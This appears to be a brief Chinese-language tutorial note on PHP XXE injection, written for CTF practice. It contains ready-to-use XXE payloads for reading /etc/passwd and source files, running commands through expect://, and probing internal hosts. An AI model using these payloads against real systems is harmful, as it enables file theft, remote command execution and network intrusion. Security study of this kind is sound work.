PHP-XXE :PHP xml 外部实体注入漏洞(XXE)
复现地址:buuoj.cn //自己搭建也行
XXE的特征
使用了LodXML( )函数。
危害:
3.1读取任意文件
file 协议,file:///etc//passwd php 协议,php://filter/read=convert.base64-encode/resource=index.php
3.2执行系统命令
部分情况会有,在特殊的配置环境下,如PHP环境中PHP的expect模块被加载到了易受攻击的系统或者能处理XML的应用中,就能执行命令。简单payload如下
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "expect://ifconfig" >]> <root> <name>&xxe;</name> </root>
3.3探测内网端口
借助漏洞实现内网探测,常见payload如下:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY> <!ENTITY xxe SYSTEM "http://192.168.199.100:80">]> <root> <name>&xxe;</name> </root>
3.4攻击内网网站(dos或者直接吃服务器资源导致无法正常服务)
参考链接:https://www.cnblogs.com/Rightsec/p/10263454.html